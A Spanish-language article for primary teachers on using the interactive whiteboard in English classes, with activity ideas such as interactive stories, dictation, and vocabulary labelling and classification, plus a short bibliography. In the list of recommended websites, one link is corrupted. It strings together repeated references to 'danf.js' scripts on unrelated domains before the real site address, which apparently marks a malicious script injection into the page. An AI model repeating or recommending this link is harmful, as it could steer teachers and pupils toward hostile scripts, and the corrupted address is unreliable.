APLICACIONES DIDÁCTICAS DE LA PIZARRA DIGITAL EN EL AULA DE IDIOMAS

Autora: María Benítez Sanz

          Con este artículo pretendo demostrar las ventajas que tiene el uso de las nuevas tecnologías de la información y la comunicación y su aplicación dentro del  aula de inglés, centrándonos principalmente en el uso de la pizarra digital interactiva, que tanta importancia está teniendo en nuestra comunidad autónoma, por tratarse esta de una de las comunidades pioneras en la utilización de estos recursos dentro del aula como una alternativa que pretender reciclar un poco más los métodos tradicionales de enseñanza.

         Cuando nosotros como maestros nos enfrentamos por primera vez ante el uso de las nuevas tecnologías y en este caso, al uso de la pizarra digital, nos damos cuenta de que este recurso tan novedoso que se nos presenta como una innovación más de la enseñanza, quizás se nos quede un poco grande, por no estar suficientemente familiarizados con él, quizás por falta de formación en la utilización de este medio tecnológico o  incluso por carecer de ideas creativas que nos permitan una utilización satisfactoria dentro del aula.

          Es necesario tener en cuenta que nuestros alumnos se presentan como “nativos virtuales” frente a los adultos y como no, frente a los profesores,  en esta generación del siglo XXI, también conocida por “generación 2.0”, por la importancia que tienen las redes sociales o el uso de medios tecnológicos. Por ello, nosotros, como maestros, debemos reciclarnos en el uso de estas nuevas tecnologías y tratar de formarnos a una velocidad supersónica para ponernos al menos a la altura de nuestros alumnos en lo que al uso de los medios tecnológicos se refiere y de esta forma convertirnos en un los mejores guías e instructores de nuestros alumnos para que realicen una correcta utilización de estos medios.

          Pero, si nos ponemos a pensar en el aula de inglés, ¿Qué ventajas y aplicaciones tendría la pizarra digital en el aula de idiomas? Aquí señalamos algunas de las posibles aplicaciones que podrían ser de gran utilizar para los docentes de idiomas:

          Una de las ventajas de la pizarra digital sería la presentación de una unidad didáctica digital. Mediante la pizarra digital podríamos realizar múltiples actividades que habitualmente realizamos en el aula, pero, en este caso, resultarían mucho más motivadoras para nuestros alumnos por presentarse en un nuevo formato que ellos no conocen, por la utilización de colores, la interactividad que las actividades e incluso por la propia participación activa de los alumnos en ellas. Así alguna de las actividades que podemos realizar son:

- Presentación de una historia interactiva: por medio del programa interwrite podemos diseñar nuestras propias viñetas para presentar una historia con los personajes, el vocabulario y las expresiones que nosotros elijamos, de tal forma que la podemos hacer de la forma más personalizada posible y resulte motivadora para nuestros alumnos.

- Otra actividad que podemos realizar es un dictado en inglés: esta actividad estaría destinada ya para los últimos cursos de Primaria y el procedimiento a seguir sería el mismo que el que realizamos con la pizarra normal. Primero le haríamos a nuestros alumnos el dictado de forma oral y luego lo corregiríamos en la pizarra por medio del procesador de textos que presenta interwrite. Nuestros alumnos también podrían participar en dicha corrección utilizando los lápices de la pizarra, o en el caso de la pizarra táctil de 5º de primaria, podrían utilizar las manos y las herramientas necesarias para corregir, subrayar o borrar.

 

          Una buena actividad que podríamos realizar en inglés sería la  escritura y clasificación de vocabulario y conceptos. Una vez revisados el vocabulario relacionado por ejemplo con la comida y con los animales en inglés, podemos hacer esta actividad de revisión, donde nuestros alumnos, con la ayuda de los lápices ópticos de la pizarra, escribirían los nombres de cada uno de los elementos que aparecen y luego los clasificarían en dos grupos arrastrándolos con la ayuda de la mano ( en la pizarra táctil) o del lápiz óptico en la pizarra normal para formar dos grupos: animals and food, realizando en este caso una actividad de “labelling” en inglés o “etiquetación” y de classification o clasificación.

 

-         Otras actividades que podríamos realizar relacionadas con estos temas serían: pictogramas, actividades de relacionar con flechas, sopas de letras, etc.

-         Quizás una buena aplicación de la pizarra sería la búsqueda de páginas webs interesantes relacionadas con el idioma y la realización de juegos interactivos en la pantalla. Para ello, algunas de las páginas que podríamos visitar serían:

www.mansioningles.com

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         O el uso de esta página http://middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&www.poissonrouge.com/redfish.php  que se muestra a continuación con la que podemos revisar el vocabulario en inglés de los animales, o de la ropa, la comida, etc

         Como vemos, todas estas actividades que ofrece la pizarra digital se muestran como una alternativa a la enseñanza mucho más dinámica y motivadora para nuestros alumnos que cualquier libro de texto, no obstante no podemos desechar ningún recurso, pues el mejor maestro es aquél que utiliza una combinación de todos los recursos a su disposición, sabiéndolos utilizar en el momento adecuado y de la manera más satisfactoria posible.

 

BIBLIOGRAFÍA

  • Byrne. D., Teaching Oral English_ Longman, London, 1989.
  • Crystal, D. The Cambridge Encyclopaedia of Language. CUP Cambridge 1987.
  • The Primary English Teacher´s guide by Brewster, Penguin 2002.

 

WEBGRAFÍA

  

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